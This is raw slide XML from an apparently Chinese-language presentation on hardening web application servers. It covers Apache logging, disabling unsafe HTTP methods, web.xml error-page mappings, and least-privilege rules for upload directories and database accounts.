              <a:t>apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>日志记录，对运行错误、用户访问等日志都记录。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>禁止不安全的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>方法</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2D2D8A"/>
              </a:solidFill>
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="50006" y="19720"/>
            <a:ext cx="9043988" cy="706437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="854710" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" kern="1200" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" kern="1200" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>应用服务器配置</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="357188" y="1071563"/>
            <a:ext cx="87868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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>应用常见</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>403</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>404</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>500</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>等访问异常，需要配置各自独立重定向页面。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在应用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>web.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>中增加以下内容配置，各个异常显示页面需要单独制作。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-57150" y="116632"/>
            <a:ext cx="9043987" cy="706438"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="854710" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" kern="1200" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" kern="1200" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>应用配置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" kern="1200" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>403</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" kern="1200" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" kern="1200" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>404</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" kern="1200" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" kern="1200" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>500</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" kern="1200" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>通用处理页面</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" kern="1200" dirty="0">
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="表格 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="714375" y="3000375"/>
          <a:ext cx="7500938" cy="3383248"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7500938"/>
              </a:tblGrid>
              <a:tr h="3382963">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>&lt;error-page&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="1">
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>&lt;error-code&gt;403&lt;/error-code&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="2">
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>&lt;location&gt;/error/403.html&lt;/location&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="2">
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>&lt;/error-page&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="2">
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>&lt;error-page&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="2">
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>&lt;error-code&gt;404&lt;/error-code&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="2">
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>&lt;location&gt;/error/404.html&lt;/location&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="2">
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>&lt;/error-page&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="2">
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>&lt;error-page&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="1">
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>&lt;error-code&gt;500&lt;/error-code&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="1">
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>&lt;location&gt;/error/500.html&lt;/location&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>&lt;/error-page&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439" marT="45704" marB="45704">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>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4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="214313" y="1214438"/>
            <a:ext cx="8786812"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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>上传文件目录的权限原则：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>权限最小化原则；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>能写入的目录不能执行，能执行的目录不能写入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>数据库帐号权限原则：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>权限最小化原则；不要给应用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>dba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>等数据库管理权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>不要分配跨库权限。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>数据库连接的配置文件中关键信息要加密</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="214313" y="142875"/>
            <a:ext cx="9043987" cy="706438"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="854710" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" kern="1200" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>权限管理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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iamisis\Desktop\崔老师的PPT\bghome0.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="email"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-740" y="1732388"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5821637" y="2204864"/>
            <a:ext cx="2018501" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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en-US" sz="5400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="04AEDA"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>谢 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="5400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="04AEDA"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>谢</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="04AEDA"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="5400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="04AEDA"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 16" descr="www.3lian.com__008.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print">
            <a:grayscl/>
            <a:lum bright="-10000" contrast="20000"/>
          </a:blip>
          <a:srcRect b="-38"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3514564" y="1794261"/>
            <a:ext cx="2007901" cy="25098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523" y="89280"/>
            <a:ext cx="7886700" cy="477202"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="50000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>应用部署架构</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" kern="10" dirty="0">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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>金融技术中心</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8D486EDB-1F4B-46FD-9A29-FEB36E09C7CB}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397396" y="1609481"/>
            <a:ext cx="1683385" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>网络安全法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="610960" y="3754391"/>
            <a:ext cx="1824447" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>等级保护</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7" y="1187942"/>
            <a:ext cx="6440073" cy="4185274"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
